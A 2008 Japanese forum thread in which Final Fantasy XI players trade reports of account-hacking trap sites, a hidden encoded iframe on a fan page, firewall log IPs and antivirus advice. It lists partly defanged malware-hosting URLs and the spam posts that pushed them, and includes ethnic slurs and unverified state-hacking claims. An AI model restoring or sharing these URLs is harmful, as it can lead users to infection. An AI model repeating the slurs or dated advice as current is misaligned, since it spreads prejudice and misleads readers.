spybot、及びeset smart security、ついでにオンラインスキャンでウィルス、スパイウェア共に
0だったので、ひとまず安心かね。

環境はOpera、表示不具合の場合だけプニル、PeerGuardianって感じで一応対策はしてる。

通信ログにも怪しいのはないし、プロセスも変なのがなかったからとりあえず終了。

念のためログインパス変更だけはしておきます。

というかなんで保存パスが消えたのかね?

724 :既にその名前は使われています:2008/04/15(火) 13:27:20.06 ID:3f7EOuVe
パスワード保存のチェックでもはずしてたんだろ

725 :713:2008/04/15(火) 13:28:40.29 ID:5LDmuRnj
それも考えたけど、自動ログインにしてたからチェックを外すも何も…

726 :既にその名前は使われています:2008/04/15(火) 13:39:24.67 ID:D7YD6Y/6
パスワードを保存する設定になってても消えた…
という報告は垢ハックが流行りだすずっと前からあったような。
原因は不明だが。

ま、気をつけるに越した事はないね。

727 :713:2008/04/15(火) 13:42:43.49 ID:5LDmuRnj
了解。

皆さん、色々とありがとうございました。

728 :既にその名前は使われています:2008/04/15(火) 13:46:39.73 ID:BnS7Yf0/
>パスワードを保存する設定になってても消えた…
>という報告は垢ハックが流行りだすずっと前からあったような。

この現象、ずっと何年も前になった事あるよ、その時は自分も、
設定は一切いじってないし、FF以外してないし、誰も触ってないのに何でだろ? と思ったけど
POLがどっかおかしいのかな〜程度に軽く考えてた。

てか、PS2の話なんで参考にならないなw


729 :既にその名前は使われています:2008/04/15(火) 13:48:17.55 ID:3f7EOuVe
フリーズしてPC再起動したときパスワード消える事あったようななかったような

730 :既にその名前は使われています:2008/04/15(火) 14:43:22.35 ID:cN/GfH/H
xxp://ffxiwar.blog91.fc2.com/
からそこの管理人が作ってるページ↓
xxp://ffxiwarrior.web.fc2.com/
に飛んだ瞬間セキュリティ発動。ウイルスに感染しました。と出た。
ソース調べたら
iframeでxxp://www.hellh.net へのリンクがあった
正確には%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74とエンコードして書かれている
fc2ブログだけじゃなくfc2のウェブスペースもやばいのかよ、油断した・・・オワタ

731 :既にその名前は使われています:2008/04/15(火) 15:18:46.15 ID:FAOHP4oO
しかし内部仕様の変更って何やったんだろ
>>722の言うとおりログイン関係で何か対策したならいいんだが。

アカハック犯罪者は、全力で解析にかかるかもしれんが
いたちごっこでもきっちり対策を進めてほしい

732 :既にその名前は使われています:2008/04/15(火) 15:20:07.34 ID:WUb6jHV0
>>730
Windowsupdateとかrealplayer削除とかを済ませたうえでの感染?

733 :既にその名前は使われています:2008/04/15(火) 15:36:38.23 ID:+zl63Zka
>>730

top.htmlにインラインがあるね
さっさとそのPC以外からパスワードかえれ
不可能なら、スクエアに電話してアカウントロックしとけ

PCはバックアップ+初期化+パッチ適応お勧め
ただし初期化時にルーター使わずダイレクトに繋いだら終わるぞw

>>732

トラップは増え続けてるかもしれんし、知りたい所だね

734 :既にその名前は使われています:2008/04/15(火) 15:50:19.67 ID:gnHfp1Wf
>>637 >>644 
ヤブログに削除依頼のメールをしておきました。
早急に対応してくれるといいのだけれど…。
自分のブログ名を使われるとは…ショックorz  by.本家


735 :既にその名前は使われています:2008/04/15(火) 15:54:33.36 ID:EaCaALi+
そういやPOLのアップデートあったが、これは垢ハック対策なのだろうか?

736 :既にその名前は使われています:2008/04/15(火) 16:01:00.94 ID:4n1UYYP8
トレードや宅配できるギルの1日の上限とか決めればいいんじゃね?ATMみたいになw

737 :既にその名前は使われています:2008/04/15(火) 16:05:51.81 ID:VoOFPXne
>736
宅配制限ついてから分配とかしにくくなる→野良主催めんどくせ
今は物価下がってるから一人当たり100万超えるような分配もないけどなw

業者は一時、バザーで取引してたよ。
クズアイテムを高い価格で客にバザーさせて
それを業者が買うの。

738 :既にその名前は使われています:2008/04/15(火) 17:16:10.16 ID:GzX8S5rx
帰宅前上げ

739 :既にその名前は使われています:2008/04/15(火) 17:38:50.92 ID:ExvLGlQo
>>730
何処のblogかと思って見に行ったら過去blog改竄されてる『FFXI:戦士スキーのブログ』さんのとこか!
blog改竄された時に一緒にやられたのか、後日やられたのかは分からないけど
業者にマークされてるんじゃないかと思っちゃうね。

しかも罠iframeがある場所が更新履歴の下の方。

blog改竄と同様なら、ウェブ上からログインして作る事が出来るfc2みたいなHPサイトも
今後要注意ってことなのかな?

740 :既にその名前は使われています:2008/04/15(火) 18:18:08.01 ID:79CY45Mj
セキュリティ対策を回避する攻撃が増加、ラックの侵入傾向分析レポート
ttp://internet.watch.impress.co.jp/cda/news/2008/04/15/19227.html

Webサイトを利用するユーザーを狙う手法としては、
SQLインジェクション攻撃などによりWebサイトを改竄し、
閲覧者に不正なプログラムをインストールさせようとする攻撃が大規模に発生。

また、ボットの通信方法も変化し、Webデータの転送で使用される
TCP 80番ポートを利用してファイアウォールを通過しようとするなど、
企業のセキュリティ対策を回避しようとする動きが目立ったとしている。


とにかく今は身銭を切って自衛をすべき。もちろん尊い犠牲者となって
法整備や強力なセキュリティが一日でも早く整うための布石になるのもありだ。

741 :既にその名前は使われています:2008/04/15(火) 18:21:31.08 ID:BAflo9EM
POLのパスワードが消える件、うちでは次の場合
消えることを確認している。PC版。サービス開始の時から仕様変わっていない模様。

オンラインに接続するときの、
「ネットワーク接続の設定」が変わったら、
保存してあるパスワードが消えて、
再入力する必要があった。

ノーパソで家ではLANで繋いでパス保存してたんだが、
出先でPHSで接続したら、パス消えてた。

742 :既にその名前は使われています:2008/04/15(火) 18:36:00.11 ID:DQj/lCf9
公式の窓ってどこからとるんですか?

743 :713:2008/04/15(火) 18:42:06.20 ID:5LDmuRnj
>>741
あー NIC2枚刺しで片方の環境を変えたからかもしれんな…

744 :既にその名前は使われています:2008/04/15(火) 18:43:50.85 ID:2f78jD7r
OSの修復インストールでもパスは消えるね

745 :既にその名前は使われています:2008/04/15(火) 18:44:10.79 ID:WUb6jHV0
>>742
コンフィグのこと時々でいいから思い出してください

746 :既にその名前は使われています:2008/04/15(火) 18:45:21.76 ID:nKa7+VQu
>>742
コンフィグ良く眺めろ

747 :既にその名前は使われています:2008/04/15(火) 18:55:52.56 ID:eBC6cTAZ
某所に張られていた怪しげなリンク

●● RMT業者の垢ハックが多発している件14 ●●
hxxp://yy65●60●kg/lae2/

これって罠だよね?


748 :既にその名前は使われています:2008/04/15(火) 19:05:10.28 ID:D7YD6Y/6
>>747
Linageエミュ鯖掲示板て書いてあるけど、コピペでスレを3つ立ててあるだけ。
どう見ても罠。

つかこのスレを騙ってやがるのか…

749 :既にその名前は使われています:2008/04/15(火) 19:13:38.17 ID:kxNceXR7
別の某所でこんなものも

ついにラグ鯖史上最大の祭りか?
ラグ鯖○○が不正アクセスで逮捕?

hxxp://jbbs●livedoor●jp/game/43913/


リンク先のアドレスは違うが、aguseで見たところ中身は>747のと同じ。
○○のとこは個人名なので一応伏せとくがラグ鯖板にあったスレ名だと思う。
2ch系の板から適当にスレ名コピペしてるみたいだな。

750 :既にその名前は使われています:2008/04/15(火) 19:15:11.76 ID:BnS7Yf0/
>>748
ちょっと笑えるw

751 :既にその名前は使われています:2008/04/15(火) 19:28:40.47 ID:0qlSLPXj
このスレを参考にPeerGuardian2を導入して利用しています。
先日BluetoothのアダプタBT-MicroEDR1を購入して、
付属のユーティリティソフトBlueSoleilを起動するたびに、PGがタスクトレイでくるくる・・・。
222.35.76.162にアクセスしてブロックしてるようなのですがなんか危ないんでしょうか?

752 :既にその名前は使われています:2008/04/15(火) 19:45:26.00 ID:WUb6jHV0
>>751
そのソフトの更新だと思うよ。
どこかのIP検索サイトでそのIPを調べておいで。
>>510〜520あたりににたような事例がある

753 :751:2008/04/15(火) 20:26:18.49 ID:0qlSLPXj
>>752
なるほど、ご回答ありがとうございました。
過去ログ見落としてて、スレ汚し失礼しましたm(_ _)m

754 :既にその名前は使われています:2008/04/15(火) 21:02:09.08 ID:d1wmw73f
>>749
/43911も存在でまとめて通報、ライブドアがID取得を国内限定にしない限り今後マシンガンのように作りそうだ。

気をつけてくれよな!

755 :既にその名前は使われています:2008/04/15(火) 21:36:54.63 ID:mADSY9Yk
ん?したらばにとんだだけで感染するの?

756 :既にその名前は使われています:2008/04/15(火) 22:17:22.36 ID:WUb6jHV0
226緊急浮上

757 :既にその名前は使われています:2008/04/16(水) 00:22:03.22 ID:zk2Ecauv
RMT

758 :既にその名前は使われています:2008/04/16(水) 00:28:14.69 ID:mczhyDOk
保守な、とりあえずぷららの『ホームページウイルスチェックサービス』やってみた。
やっぱりプロキシだった。しかもちょっと面倒臭い。
ブラウザ立ち上げるたびにID&PASS要求される。

ただ一応FF11専用ッてだけではなくネットショッピングにも使えるかな〜と思う。

ホームページウイルスチェックサービス設定マニュアル
設定マニュアル Internet Explorer 版
ttp://www.plala.or.jp/member/option_service/secuplus/hp_vcheck/manual_win_ie.html

759 :既にその名前は使われています:2008/04/16(水) 00:41:52.93 ID:/mL6H421
>>747
http://boadongo●org/up-gran2489  <= topバナーの画像 (b)
http://sefdspace●net/rsking4314  <=topバナーのリンク (c)

>>749
http://sefdspace●net/rsking4314  <= bodyタグのbackground (a)
http://boadongo●org/up-gran2489  <= topバナーの画像 (b)
http://www●megaretic●org/Rancor_EP  <=topバナーのリンク (c)

(a)と(b)は『画像としてリクエスト』を掛けているにもかかわらず、
Content-Type: text/htmlで返ってきているので大概のブラウザでは無効(流石のIEでも)。
(c)だけ、クリックしたらヤバイ。

したらばとかははサブディレクトリ方式のURLなのでFC2のようにドメインでNG Wordに
出来ないのがめんどくさいなぁ。yaplogとかもそうなんだけど。


760 :既にその名前は使われています:2008/04/16(水) 01:03:16.29 ID:YugVGku2
したらばのレンタルBBSも勝手に書き換えられるってことか?

761 :free tibet:2008/04/16(水) 01:59:59.34 ID:LQ1WDUCk
ageつつシナ除けおまじない

六四天安門事件
西蔵解放 Free Tibet
東トルキスタン 東突厥斯坦
法輪功

762 :既にその名前は使われています:2008/04/16(水) 02:21:26.63 ID:9uhov/jt
>>761
それなぁ獣wikiの編集合戦中に書いてた奴居ったけど全く効果無しだったぞw

763 :既にその名前は使われています:2008/04/16(水) 02:26:59.59 ID:5vYTBDlq
インラインフレームで、チベット解放運動のサイトとか、天安門事件の
真実を載せているサイトとかに飛ばせばいいんじゃね?www

764 :既にその名前は使われています:2008/04/16(水) 02:41:22.97 ID:R5kmEFK3
Windowsの脆弱性を突く「画像ウイルス」の作成ツールが出現
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080415/299043/

今のうちはキディだけなんだけど、
今後にむけて注意を払っておくことを薦める。

765 :既にその名前は使われています:2008/04/16(水) 04:43:06.66 ID:lcLk7jlv
修正パッチを適用しておけばOK

766 :既にその名前は使われています:2008/04/16(水) 04:50:07.97 ID:3zkCmGtO
RMT

767 :既にその名前は使われています:2008/04/16(水) 05:33:54.06 ID:/mL6H421
>>760
既存のしたらばを改ざんされたという情報は現在の所無いので、現時点では
「新規にしたらばを取得、したらばの機能であるデザインカスタマイズの機能で
アカハクアドレスを組み込む」といった感じ。ただiframeとか使われてないので
閲覧だけで感染という事は今の所無い…のだが、確か高度なカスタマイズとやらで
素のHTMLタグを加えられた気がする(管理した事無いので自信無し)ので今後とも
安心とはいえないと思う。

>>761
同じく、他のMMOの管理放棄されているWikiで実験的にやってみたけど、効果は
認められなかったと報告。実験前後で連中の投稿頻度に有意差は見られなかった。
また、実際には日本からのアクセスも多いので(件のODN等)、ほぼ無駄かと。

768 :既にその名前は使われています:2008/04/16(水) 07:49:52.58 ID:mczhyDOk
中国のグレートファイアウォールが適応されないて事か?
スクエニの業者癒着説がある様に中国が国営でハッキング業やってるとしか思えんな。

769 :既にその名前は使われています:2008/04/16(水) 08:59:21.64 ID:6boof/+H
リネでも無かった?
中国人留学生が日本で踏み台してたとか。
垢ハック犯罪者連中が中国内にいても、それを手伝っている者が
日本に数人いれば日本で罠サイト張ったり改竄し放題って事じゃ。

770 :既にその名前は使われています:2008/04/16(水) 09:08:47.76 ID:TsYucABg
>>769
それをやってくれると、逆に今の日本の法律でも逮捕できていいのだが。
その方向に持って行くためにも中国韓国IPをスクエニがとっととアクセス禁止にすればいいのだが。

771 :既にその名前は使われています:2008/04/16(水) 09:11:48.50 ID:w9+nVU0K
>>768
Wikipedia見るかぎり中国の検閲システム「金盾」は
串させば余裕で回避可能みたいだから
まだ完璧なシステムには程遠いようだね。

772 :既にその名前は使われています:2008/04/16(水) 09:17:01.46 ID:hV6UAvtM
FFの場合、韓国とか台湾とか北米に踏み台作ってそっから来るんじゃないかっつー懸念はあるけどな。
リネ2はそこんとこどうしてたんだろ。

773 :既にその名前は使われています:2008/04/16(水) 09:25:09.96 ID:h2uv9uRD
スクエニは手始めに↓こいつみたいな素性が分かっているやつから営業妨害で訴えろ
http://www.rbbtoday.com/news/20060328/29897.html

774 :既にその名前は使われています:2008/04/16(水) 09:52:18.25 ID:Jd4OeFMG
>>770
海外IPを弾くのがどのネトゲでも基本になってる理由の一つがそれ。
狙う国というのは要するに通貨レートが高い国なので、
その国内に中継IPを設置するというだけでも業者にとっては痛手、
業者キャラが摘発されまくった場合、すぐに赤字になって撤退することになる。

FFで業者が減らないのは、この高価な日本IP中継地が必要ないということ、
資本0で始められるから、いくらキャラ摘発されても
数時間で設備代から人件費と十分な利益が出せるFFから撤退する必要が無い。

775 :既にその名前は使われています:2008/04/16(水) 12:32:54.25 ID:1LaKfdiv
  Θ⌒ヾ 
  Θ  Θ   <保守
 (__Θ_)


776 :既にその名前は使われています:2008/04/16(水) 12:37:34.79 ID:mczhyDOk
>>771
なんだよ、どこが「グレート」なんだよw

>>772
北米ならサービス提供地域内だからリネ2みたいになんか現実の法で取り締まれるんじゃない?

777 :最近多い罠サイトマルチ:2008/04/16(水) 12:37:47.86 ID:ilIwtBCm
爺鯖板HNMスレ
 826 名前:( ゚∀゚)彡 オッパイ!オッパイ![] 投稿日:2008/04/14(月) 16:24:25 ID:stwM1VRc0
 d
 もっと詳しく知りたい奴はここ見てくれ
 ●● RMT業者の垢ハックが多発している件14 ●●
 http://jbbs■livedoor■jp/game/43911/

ブーメラン板非女スレ
 423 名前:名も無き投擲さん[] 投稿日:08/04/15(火) 17:37:08 ID:9aEC3u8d
 d
 もっと詳しく知りたい奴はここ見てくれ
 ●● RMT業者の垢ハックが多発している件14 ●●
 http://yy65■60■kg/lae2/

 438 名前:名も無き投擲さん[] 投稿日:08/04/16(水) 12:22:26 ID:fU9zKpKJ
 d
 もっと詳しく知りたい奴はここ見てくれ
 ●● RMT業者の垢ハックが多発している件14 ●●
 http://jbbs■livedoor■jp/netgame/105/

778 :既にその名前は使われています:2008/04/16(水) 12:54:52.42 ID:hX3cS70U
FFXI合成板 錬金術スレにもあったので注意age

124 名前: スキル77.4 投稿日: 2008/04/15(火) 13:54:59 r5TE9Pl20
d
もっと詳しく知りたい奴はここ見てくれ
●● RMT業者の垢ハックが多発している件14 ●●
ttp://jbbs■livedoor■jp/game/43911/


779 :既にその名前は使われています:2008/04/16(水) 13:07:28.74 ID:2bl4JDZ8
それやばいなぁ
タイトルだけとはいえ
垢ハクスレを語った罠リンクって
引っかかる人多いかもよ

780 :既にその名前は使われています:2008/04/16(水) 13:11:58.15 ID:tVIZnBB/
ODNの規制はまだ解除されてないはずだが、他ISPに飛び火したん?

781 :既にその名前は使われています:2008/04/16(水) 13:36:26.61 ID:ug68KbPj
>>780
URLみれ。したらば=2chと関係ないだろ?
したらば自体は串であろうとなんであろうと、掲示板作る事は可能。
そこに罠を作って誘い込むやり方…こんなの思いつくのって日本人しかありえんがな。

それにしても、罠サイト作る前からここに誘導する馬鹿の思考を見事に利用された形だな。
てか、教えるの面倒&理解してないなら誘導URLなんかはるなよ馬鹿。

782 :既にその名前は使われています:2008/04/16(水) 13:50:53.94 ID:kO/5faxZ
串刺されたら完璧には不可能だろうな
OverSSLとか使われたら内容解読も困難になるだろうしねぇ

まぁでも国内犯罪になるので、逮捕が可能になるのは
他の人も言ってるとおり

783 :既にその名前は使われています:2008/04/16(水) 14:03:22.52 ID:92lMRfCo
今日PG2で以下の韓国からの送信をはじいていたんだけどIP検索かけても
「ローカルIPアドレスは指定できません」とでます。
なにかやられたと見るべきですか?

192.168.24.72.1735
192.168.24.72.1644
192.168.24.72.1587

784 :既にその名前は使われています:2008/04/16(水) 14:15:09.68 ID:JYqeLwa9
なんか業者とは関係無しの愉快犯も混じってそうだなw

785 :既にその名前は使われています:2008/04/16(水) 14:16:44.62 ID:XngG+2NK
>>783
プロトコルなに?
で、ローカルのネットワークアドレスは
192.168.24.xx?

思い当たるふしがなかったら感染→ネットワーク内の
別PCにも感染を試みてる可能性はあるな

786 :既にその名前は使われています:2008/04/16(水) 14:21:54.95 ID:92lMRfCo
プロトコルはTCPってあります。



787 :既にその名前は使われています:2008/04/16(水) 14:31:07.63 ID:14qerb3f
>>783
とりあえず、コマンドプロンプトから

netstat -a -b -v -n

と入力して、その192.168.24.72が表示されてるとこを見てみるんだ
コマンドプロンプトは
[スタート]>[全てのプログラム]>[アクセサリ]>[コマンドプロンプト]
で起動できる

788 :既にその名前は使われています:2008/04/16(水) 14:36:17.05 ID:XngG+2NK
>>786
あちゃー、TCPか;;
送り先のポート番号は?

Castとかそういうツールつかってないよね?

ちなみにネットワークアドレスが192.168.24.xxなら
そこは韓国じゃなくて自分のネットワークだぞw

789 :既にその名前は使われています:2008/04/16(水) 14:47:33.69 ID:92lMRfCo
>787

やってみました。こっち方面の知識はさっぱりなんですがヽ(´Д`;)ノ

pol.exeなんとかとか
c:\WINDOWS\system32\imon.dllとか表示されてます
やばそうな雰囲気ですね(泣)


790 :既にその名前は使われています:2008/04/16(水) 14:54:53.12 ID:92lMRfCo
>ちなみにネットワークアドレスが192.168.24.xxなら
>そこは韓国じゃなくて自分のネットワークだぞw

あれ、これは自分のなのか(滝汗)

送り先が

203.212.189.254.80

220.73.158.19.10015
220.73.158.17.10015
220.73.158.21.10015

で、こっちは韓国で、これでひっかかったぽいのですが〜


791 :既にその名前は使われています:2008/04/16(水) 14:57:32.11 ID:rZ0zkpJC
>>789
おまいさんのPC、NOD32インストールされてるだろw

792 :既にその名前は使われています:2008/04/16(水) 14:58:37.71 ID:92lMRfCo
>>791
いれてまっす!

793 :既にその名前は使われています:2008/04/16(水) 15:01:38.07 ID:rZ0zkpJC
今すぐNOD32立ち上げてIMONをOFFにすればそれなくなるよw

794 :既にその名前は使われています:2008/04/16(水) 15:04:29.94 ID:92lMRfCo
え、NOD32のせいだったんですか(,,゚Д゚)

(,,゚Д゚
(,,゚
(,
 .

・・・お、お騒がせしました・・・・・ orz 

795 :既にその名前は使われています:2008/04/16(水) 15:09:21.49 ID:92lMRfCo
でも一般家庭でIMONをOFFすることはオススメしませんとあるんですが
切らないほうがいいのかな?

なんでPG2がこれをひっかけるのかさっぱりヽ(´Д`;)ノ

796 :既にその名前は使われています:2008/04/16(水) 15:12:31.99 ID:FyButfQt
まず送り先のIPを調べろよw

797 :既にその名前は使われています:2008/04/16(水) 15:16:09.19 ID:92lMRfCo
送り先が韓国サイトだったんでテンパリましたorz

798 :既にその名前は使われています:2008/04/16(水) 15:18:30.98 ID:/30fAjlD
>>790に書いたIPアドレスにアクセスしてるのはimon.dllなのか?

799 :既にその名前は使われています:2008/04/16(水) 16:24:28.89 ID:/jds7m1R
前スレくらいで今年2月から2回垢ハックされたけどついに3回目!と
涙目だった俺です。
その後みなさんの指示通りに初期化して
すべて最初から再インストールし直しました。
その後1ヶ月近く経ちますが、今のところ問題ありません。
対策は、
・Windows Update常に最新
・F-secureで常時監視(カスペエンジンプラスα)
・POLパスワードは毎回手入力
・怪しいサイトには近づかない(FFXIAH.com除く)
・Operaを使用
・FF以外の用途には使用しない
です。PG2のアドバイスをいただいたけど、
F-secureでインターネット接続しようとするアプリなどは
すべて感知できますし、今のところ入れてません。めんどくさいw

800 :既にその名前は使われています:2008/04/16(水) 16:33:03.80 ID:uwlLelaf
>怪しいサイトには近づかない(FFXIAH.com除く)
そこも広告から感染とか報告なかったか?

801 :既にその名前は使われています:2008/04/16(水) 16:39:06.66 ID:7H98ICG9
>>790
>203.212.189.254.80
これは、Wikipediaかな。

>220.73.158.xxx
こっちのは、よく分からんかったけど、本当に、IMONなのかね。
ネットワークセグメントは、Korea Telec○mのだけど、
怪しく思えてしまう。


802 :既にその名前は使われています:2008/04/16(水) 16:41:48.51 ID:2bl4JDZ8
FFXIAHは、広告先が罠だったりするらしいけど
広告踏まなきゃ大丈夫だろう、ってわけでなく
広告枠がまぎわらしく、踏む気なくても踏んでしまう事があれば問題。
FFXIは携帯で見た方が安全だろうね。

803 :既にその名前は使われています:2008/04/16(水) 17:32:25.93 ID:9uhov/jt
KOREA TELECOMならWindowsupdateも使ってるな

804 :既にその名前は使われています:2008/04/16(水) 17:44:58.73 ID:ZG2ERbp8
FF以外に使わないって言った場合FFAHも他のサイトも見ないだろ常識的に

805 :既にその名前は使われています:2008/04/16(水) 17:48:48.27 ID:098nykah
2回も抜かれたら、問答無用でFF専用にしろよww

806 :既にその名前は使われています:2008/04/16(水) 17:57:08.92 ID:wPGNmscP
つーか、FFXIAH自体がだいたい怪しいサイトだろう。
3回もハックされてこれじゃ、バカもここに極まれりだな。

807 :既にその名前は使われています:2008/04/16(水) 18:11:38.95 ID:DpUESy6P
何をすりゃそんなに何度もハックされんのかね・・・


808 :既にその名前は使われています:2008/04/16(水) 18:19:20.28 ID:FyButfQt
>>807
大したセキュリティソフトも入れずWindowsupdateもせず、
パスを手入力すれば大丈夫とかいう説を唱えてわざと罠を踏むような奴だ。
ま、自分で思い知ったのなら今後は気をつけるだろ

809 :既にその名前は使われています:2008/04/16(水) 19:02:53.75 ID:zHLKwtQx
風俗嬢3人とやって経験豊富だからなんでも聞いてくれって書き方なのが見ていてつらい


810 :既にその名前は使われています:2008/04/16(水) 19:05:01.48 ID:mczhyDOk
Kokubu>「後天性免疫不全症候群に罹ってどう思った?」

811 :既にその名前は使われています:2008/04/16(水) 20:09:38.17 ID:qPvqskl9
PG2で 送信先 China 59.151.50.32:80 プロコトルTCP を
午前3時に3回ブロックした履歴がありました。
どうしたらいいでしょうか。

812 :既にその名前は使われています:2008/04/16(水) 20:10:36.00 ID:CXH2i5Zl
Windows再インスコ

813 :既にその名前は使われています:2008/04/16(水) 20:21:49.61 ID:XngG+2NK
>>811
IP調べた?

FONとか使ってない?

814 :既にその名前は使われています:2008/04/16(水) 20:24:05.39 ID:K78KANhQ
>>811
俺は59.151.50.51があった。
Aviraでスキャンしたけど出てこないんだよな
なんなんだろ…orz

815 :既にその名前は使われています:2008/04/16(水) 20:28:08.67 ID:5aaSLau4
>>811
ブロックリストのアップデートで中国に接続することがあるっぽい

816 :既にその名前は使われています:2008/04/16(水) 20:28:59.82 ID:XwW3oYbF
>>811
http://www.aguse.jp/?m=w&url=59.151.50.32&retry.x=59&retry.y=13&retry=0

817 :既にその名前は使われています:2008/04/16(水) 20:34:50.90 ID:K78KANhQ
>>816
おお、ここ便利だな
さんくす!

818 :既にその名前は使われています:2008/04/16(水) 20:52:25.90 ID:7H98ICG9
>>814
>182
直接の原因は解決しなかったけど、
前に調べた時は、>182のような感じだった。

819 :既にその名前は使われています:2008/04/16(水) 21:04:49.12 ID:K78KANhQ
>>818
おおお、すげえ参考になった!
さんくす!

820 :818:2008/04/16(水) 21:18:52.32 ID:7H98ICG9
>>811 の[59.151.50.32]も、>>182 と同じ挙動っぽい。


821 :既にその名前は使われています:2008/04/16(水) 22:47:56.73 ID:XOjNYWqC
 

822 :既にその名前は使われています:2008/04/16(水) 22:50:47.72 ID:6qRgmsxg
ホシュ

823 :既にその名前は使われています:2008/04/16(水) 23:37:11.12 ID:mczhyDOk
スクエニさんシステムメッセで垢ハック注意報流してネット

824 :既にその名前は使われています:2008/04/16(水) 23:45:17.12 ID:bJLpRuC6
ログインした時に毎回注意呼びかけてもいいくらいだよな。

825 :既にその名前は使われています:2008/04/17(木) 00:31:27.75 ID:OnS33wuc
なんか、2ch全体が重いっぽいけど、アタックでもされてるのかね。


826 :既にその名前は使われています:2008/04/17(木) 00:34:33.86 ID:tPCCX6mm
確かに重いな、運営板をみたところ厨華・香港からのアクセスが増えているっぽい


827 :既にその名前は使われています:2008/04/17(木) 00:34:51.50 ID:hwhoTx2D
>>825
このところずっと2chの上位鯖が特アからアタックされてるらしい

828 :既にその名前は使われています:2008/04/17(木) 00:36:33.45 ID:tPCCX6mm
307 名前:ソフィー ◆Zwdurge/wE [] 投稿日:2008/04/17(木) 00:10:59 ID:rIhJDj7f0 ?S★(616038)
>>301
すみません中国からの攻撃がやばいっす

314 名前:ソフィー ◆Zwdurge/wE [] 投稿日:2008/04/17(木) 00:12:47 ID:rIhJDj7f0 ?S★(616038)
中国・韓国・朝鮮からの攻撃が一斉にきてるんですよ・・
いや冗談じゃなくって・・こっちだって必死なんだからお前ら書き込むな

829 :既にその名前は使われています:2008/04/17(木) 00:44:30.99 ID:cCNFuVlj
重すぎる

830 :既にその名前は使われています:2008/04/17(木) 01:20:44.22 ID:tddmDnO6
こんばんは、変な事が起きてしまいました。もしよければ相談に乗ってください。

先程PCを起動してFFをやろうとしたのですが、
ウイルスセキュリティ0が「マルウェアを発見しました。隔離します」
といった感じのメッセージが連発されてPOLが起動できなくなってしまいました。

すぐにウィルス検査をしようとセキュ0を起動したのですが、何故かスキャンが開始できませんでした。
ネットで調べようとオペラを起動しようとしたのですが、オペラまで隔離されて使えなくなってしまいました。

再起動しても状況が変わらないので、システムの復元で1週間前の状態に戻し、セキュ0も再インストしたところ
とりあえず元に戻ったのでPOLを起動してみたのですが
「POLにようこそ!入会の手続き〜」
といった感じのPOL初回起動時に出る設定画面が出てきました。

ウィルススキャンをしたところ感染は見つかりませんでしたので
すぐにログインしてキャラ確認とパス変更したのですが
これって単にPCがバグってただけなんでしょうか?


831 :既にその名前は使われています:2008/04/17(木) 02:04:51.14 ID:ggbTHZMk
重い重い重い重い重い重い重い×52@運用情報
http://qb5.2ch.net/test/read.cgi/operate/1208360779/302
302 名前:マァヴ ◆jxAYUMI09s [] 投稿日:2008/04/17(木) 02:02:51 ID:rmId0Gf80 ?DIA(100001)
日本から観察して最初に気がついたのは、帯域が異様に小さくなってることだったんだな(^_^;)
なので、コアルータあるいは回線の設定に問題があるんじゃないかと疑ったわけだ。
で、トラフィックがピークになる前に対応を開始したんだけど
プライムタイムに間に合わなかった・・・・と(^_^;)面目ない

で、PIEにはバックボーンの帯域が狭くなってると伝えたんだけど
じゃあ、なぜそういうふうに見える状況になったかっていうと・・・・
おいらにはさっぱり(^_^;)

ただ、こうやって復旧したわけだから、ロバートたちは状況を把握して
適切に対応したわけで、何が原因かもおいおいわかるんでないかと(^_^;)

832 :既にその名前は使われています:2008/04/17(木) 02:06:55.03 ID:ggbTHZMk
重い重い重い重い重い重い重い×52@運用情報
http://qb5.2ch.net/test/read.cgi/operate/1208360779/282

282 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2008/04/17(木) 01:59:41 ID:FqfASCpS0
Let's talk with Jim-san. Part9
http://set.bbspink.com/test/read.cgi/erobbs/1202891905/392

392 名前:jim ◆6P7QkQf8Ys @Apparently admin ★[] 投稿日:2008/04/17(木) 01:51:19 ID:???
DDOS attack today.

jimさんがこんなことを言ってるけど関係あるのかな?

833 :既にその名前は使われています:2008/04/17(木) 02:08:27.04 ID:fMK10o+9
ウィルスセキュリティゼロは安全性がゼロな上にそんな珍妙な動作まで招くのか

834 :既にその名前は使われています:2008/04/17(木) 02:11:30.44 ID:Zka2Jpsy
>>830
サポセンやウィルス0に問い合わせるしか・・

自分も0なんだけど変えた方がいいのかな
ちなみにvista

835 :既にその名前は使われています:2008/04/17(木) 02:23:43.08 ID:Zka2Jpsy
ウィルス0だめか・・ソースネクストだもんな。変えよう

まず、ウイルス対策ソフトは有料・無料を問わず、VB100% awardを毎年4回以上コンスタントに受賞してるものを入れましょう
VB100% awardは世界中で流行っているウイルス(In the Wild)を100%誤検出無しに検出するものにだけ与えられる賞で、業界標準になってます(Virus Bulletinというところが年に6回テストしてます)

VB100% awardのような最低限のテストも満足に合格しないようなソフトを入れても無駄になるだけです

有料の対策ソフトはみんな毎年4回以上受賞してるように思われるけど、そんなことはありません
例えばウイルスバスターやキングソフト、ソースネクストはVirus Bulletinのテストに参加してなかったり、VB100% awardの受賞回数が極端に少ない(2回以下)ものなんで、ウイルス対策ソフトとして十分な能力があるとは言えません
こういう能力の低い有料ソフトを入れるより、avastやAVGの無料版を入れた方がずっと安全な環境になります(avastとAVGは去年のテストでもVB100% awardを5回受賞してます)

2006年のVB100% awardの受賞回数は
6回: Kaspersky, McAfee, NOD32
5回: avast, AVG, CA, Norman, Sophos, Symantec
4回: AntiVir, BitDefender, F-Secure

836 :830:2008/04/17(木) 02:25:00.71 ID:tddmDnO6
自分はXPでやってます。
昨日から、何故か壷を起動してるのに何も変わらないという現象が起きていたのですが
システムの復元をした後はちゃんと機能するように直りました。
単にPCがおかしくなっていただけかもしれません。お騒がせしました<(_ _)>

837 :830:2008/04/17(木) 02:29:52.37 ID:tddmDnO6
>>835
ご丁寧に説明していただいてありがとうございます<(_ _)>
avastに変えてみます。

838 :既にその名前は使われています:2008/04/17(木) 02:46:48.74 ID:Xo5qTg3n
言ってはなんだけど、キングソフトやソースネクストのソフト使ってるってギャグだな。


839 :既にその名前は使われています:2008/04/17(木) 03:39:57.54 ID:ywZKWC3Y
でも日本じゃそのギャグを大まじめにやってる奴が多いから困る。
zeroとかシェアが凄いんだってな。

840 :既にその名前は使われています:2008/04/17(木) 03:48:48.03 ID:lWucO5At
実力に不相応なシェアを取ってるって事は
それらの会社の営業や広告部門は優秀なんだな

841 :既にその名前は使われています:2008/04/17(木) 03:52:07.33 ID:ywZKWC3Y
後やっぱ値段もでかいんだろうなぁ。やすいもんな確かに。

